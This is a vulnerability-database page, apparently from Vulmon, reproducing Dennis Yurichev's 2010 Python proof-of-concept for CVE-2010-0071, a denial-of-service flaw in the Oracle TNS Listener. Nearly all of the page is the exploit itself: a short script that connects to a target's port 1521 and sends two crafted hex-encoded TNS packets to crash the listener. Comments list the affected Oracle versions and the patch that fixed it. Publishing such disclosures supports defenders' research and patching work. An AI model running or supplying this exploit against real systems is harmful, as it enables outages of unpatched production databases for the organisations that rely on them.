Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Oracle TNS Listener Denial Of Service

Related Vulnerabilities: CVE-2010-0071  
Publish Date: 22 Jan 2010
Author: Dennis Yurichev
Source 
                							

                # TNS Listener (Oracle RDBMS) exploit, cause Listener process crash

# While running on 11.1.0.7.0 win32, nsglvcrt() Listener function attempt
# to allocate huge memory block and copy *something* to it.

# TID=3052|(1) MSVCR71.dll!malloc (0x4222fc5) (called from 0x438631 (TNSLSNR.EXE!nsglvcrt+0x95))
# TID=3052|(1) MSVCR71.dll!malloc -> 0x2530020
# TID=3052|(0) TNSLSNR.EXE!__intel_fast_memcpy (0x2530020, 0, 0x4222fc4) (called from 0x438647 (TNSLSNR.EXE!nsglvcrt+0xab))

# (addresses are for TNS Listener 11.1.0.7.0 win32 unpatched)
# If I correct, nsglvcrt() function is involved in new service creation.

# Successfully crashed:
#  Oracle RDBMS 11.1.0.6.0 win32 with CPUapr2009 applied
#  Oracle RDBMS 11.1.0.7.0 win32 with CPUapr2009 applied
#  Oracle RDBMS 10.2.0.4 win32 with CPUapr2009 applied
#  Oracle RDBMS 10.2.0.2 Linux x86
# Not crashed:
#  Oracle RDBMS 11.2 Linux x86

# Vulnerability discovered by Dennis Yurichev <dennis@conus.info>

# Fixed in CPUjan2010 as CVE-2010-0071 (CVSS 10.0):
# http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2010.html

from sys import *
from socket import *

sockobj = socket(AF_INET, SOCK_STREAM)

sockobj.connect ((argv[1], 1521))

sockobj.send(
    "\x00\x68\x00\x00\x01\x00\x00\x00"
    "\x01\x3A\x01\x2C\x00\x00\x20\x00"
    "\x7F\xFF\xC6\x0E\x00\x00\x01\x00"
    "\x00\x2E\x00\x3A\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x28\x43\x4F\x4E\x4E\x45"
    "\x43\x54\x5F\x44\x41\x54\x41\x3D"
    "\x28\x43\x4F\x4D\x4D\x41\x4E\x44"
    "\x3D\x73\x65\x72\x76\x69\x63\x65"
    "\x5F\x72\x65\x67\x69\x73\x74\x65"
    "\x72\x5F\x4E\x53\x47\x52\x29\x29"
)

data=sockobj.recv(102400)

sockobj.send(
    "\x02\xDE\x00\x00\x06\x00\x00\x00"
    "\x00\x00\x00\x00\x02\xD4\x20\x08"
    "\xFF\x03\x01\x00\x12\x34\x34\x34"
    "\x34\x34\x78\x10\x10\x32\x10\x32"
    "\x10\x32\x10\x32\x10\x32\x54\x76"
    "\x00\x78\x10\x32\x54\x76\x44\x00"
    "\x00\x80\x02\x00\x00\x00\x00\x04"
    "\x00\x00\x70\xE4\xA5\x09\x90\x00"
    "\x23\x00\x00\x00\x42\x45\x43\x37"
    "\x36\x43\x32\x43\x43\x31\x33\x36"
    "\x2D\x35\x46\x39\x46\x2D\x45\x30"
    "\x33\x34\x2D\x30\x30\x30\x33\x42"
    "\x41\x31\x33\x37\x34\x42\x33\x03"
    "\x00\x65\x00\x01\x00\x01\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x64\x02"
    "\x00\x80\x05\x00\x00\x00\x00\x04"
    "\x00\x00\x00\x00\x00\x00\x01\x00"
    "\x00\x00\x10\x00\x00\x00\x02\x00"
    "\x00\x00\x84\xC3\xCC\x07\x01\x00"
    "\x00\x00\x84\x2F\xA6\x09\x00\x00"
    "\x00\x00\x44\xA5\xA2\x09\x25\x98"
    "\x18\xE9\x28\x50\x4F\x28\xBB\xAC"
    "\x15\x56\x8E\x68\x1D\x6D\x05\x00"
    "\x00\x00\xFC\xA9\x36\x22\x0F\x00"
    "\x00\x00\x60\x30\xA6\x09\x0A\x00"
    "\x00\x00\x64\x00\x00\x00\x00\x00"
    "\x00\x00\xAA\x00\x00\x00\x00\x01"
    "\x00\x00\x17\x00\x00\x00\x78\xC3"
    "\xCC\x07\x6F\x72\x63\x6C\x00\x28"
    "\x48\x4F\x53\x54\x3D\x77\x69\x6E"
    "\x32\x30\x30\x33\x29\x00\x01\x00"
    "\x00\x00\x58\x00\x00\x00\x01\x00"
    "\x00\x00\x50\xC5\x2F\x22\x02\x00"
    "\x00\x00\x34\xC5\x2F\x22\x00\x00"
    "\x00\x00\x9C\xC5\xCC\x07\x6F\x72"
    "\x63\x6C\x5F\x58\x50\x54\x00\x09"
    "\x00\x00\x00\x50\xC5\x2F\x22\x04"
    "\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x34"
    "\xC5\xCC\x07\x6F\x72\x63\x6C\x5F"
    "\x58\x50\x54\x00\x01\x00\x00\x00"
    "\x05\x00\x00\x00\x01\x00\x00\x00"
    "\x84\xC5\x2F\x22\x02\x00\x00\x00"
    "\x68\xC5\x2F\x22\x00\x00\x00\x00"
    "\xA4\xA5\xA2\x09\x6F\x72\x63\x6C"
    "\x00\x05\x00\x00\x00\x84\xC5\x2F"
    "\x22\x04\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\xFC\xC4\xCC\x07\x6F\x72\x63"
    "\x6C\x00\x01\x00\x00\x00\x10\x00"
    "\x00\x00\x02\x00\x00\x00\xBC\xC3"
    "\xCC\x07\x04\x00\x00\x00\xB0\x2F"
    "\xA6\x09\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x89\xC0\xB1\xC3\x08\x1D"
    "\x46\x6D\xB6\xCF\xD1\xDD\x2C\xA7"
    "\x66\x6D\x0A\x00\x00\x00\x78\x2B"
    "\xBC\x04\x7F\x00\x00\x00\x64\xA7"
    "\xA2\x09\x0D\x00\x00\x00\x20\x2C"
    "\xBC\x04\x11\x00\x00\x00\x95\x00"
    "\x00\x00\x02\x20\x00\x80\x03\x00"
    "\x00\x00\x98\xC5\x2F\x22\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x0A\x00"
    "\x00\x00\xB0\xC3\xCC\x07\x44\x45"
    "\x44\x49\x43\x41\x54\x45\x44\x00"
    "\x28\x41\x44\x44\x52\x45\x53\x53"
    "\x3D\x28\x50\x52\x4F\x54\x4F\x43"
    "\x4F\x4C\x3D\x42\x45\x51\x29\x28"
    "\x50\x52\x4F\x47\x52\x41\x4D\x3D"
    "\x43\x3A\x5C\x61\x70\x70\x5C\x41"
    "\x64\x6D\x69\x6E\x69\x73\x74\x72"
    "\x61\x74\x6F\x72\x5C\x70\x72\x6F"
    "\x64\x75\x63\x74\x5C\x31\x31\x2E"
    "\x31\x2E\x30\x5C\x64\x62\x5F\x31"
    "\x5C\x62\x69\x6E\x5C\x6F\x72\x61"
    "\x63\x6C\x65\x2E\x65\x78\x65\x29"
    "\x28\x41\x52\x47\x56\x30\x3D\x6F"
    "\x72\x61\x63\x6C\x65\x6F\x72\x63"
    "\x6C\x29\x28\x41\x52\x47\x53\x3D"
    "\x27\x28\x4C\x4F\x43\x41\x4C\x3D"
    "\x4E\x4F\x29\x27\x29\x29\x00\x4C"
    "\x4F\x43\x41\x4C\x20\x53\x45\x52"
    "\x56\x45\x52\x00\x68\xC5\x2F\x22"
    "\x34\xC5\x2F\x22\x00\x00\x00\x00"
    "\x05\x00\x00\x00\x84\xC5\x2F\x22"
    "\x04\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00"
    "\xFC\xC4\xCC\x07\x6F\x72\x63\x6C"
    "\x00\x09\x00\x00\x00\x50\xC5\x2F"
    "\x22\x04\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x34\xC5\xCC\x07\x6F\x72\x63"
    "\x6C\x5F\x58\x50\x54\x00"        
)

sockobj.close()

<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started